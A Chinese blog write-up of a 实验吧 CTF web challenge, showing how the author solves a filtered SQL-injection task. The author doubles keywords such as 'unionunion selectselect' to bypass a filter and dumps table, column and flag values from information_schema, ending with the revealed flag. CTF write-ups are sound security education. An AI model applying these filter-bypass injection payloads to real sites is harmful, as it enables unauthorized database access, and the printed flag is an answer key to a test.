实验吧CTF-WEB

实验吧CTF题库-WEB

做题并没有按照顺序,跳着来做的,写文章的目的就是为了记录下解题的思路,当然如果能够顺便帮助到别人的话是最好不过的啦,哈哈~~~,有道友的话欢迎交流。


1. 简单的sql注入

通过注入获得flag值(提交格式:flag{})
解题链接: [http://ctf5.shiyanbar.com/423/web/]

键入 1’
提交后页面报错。You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1

所以页面应该是字符串注入,用order by 检测下有三列
然后用联合查询,因为他过滤了过滤了关键词以及字段,所以用重复两个关键字来对付过滤机制。

1' unionunion  selectselect  table_name  fromfrom  information_schema.tables wherewhere '1'='1

提交后爆出来的标段存在flage

1' unionunion  selectselect  column_namcolumn_namee  fromfrom  information_schema.coluinformation_schema.columnsmns  wherewhere  table_name='flag


1'  unionunion  selectselect  flag  fromfrom  flag  wherewhere  '1'='1

ID: 1' union select flag from flag where '1'='1
name: baloteli
ID: 1' union select flag from flag where '1'='1
name: flag{Y0u_@r3_5O_dAmn_90Od}

你可能感兴趣的:(实验吧CTF-WEB)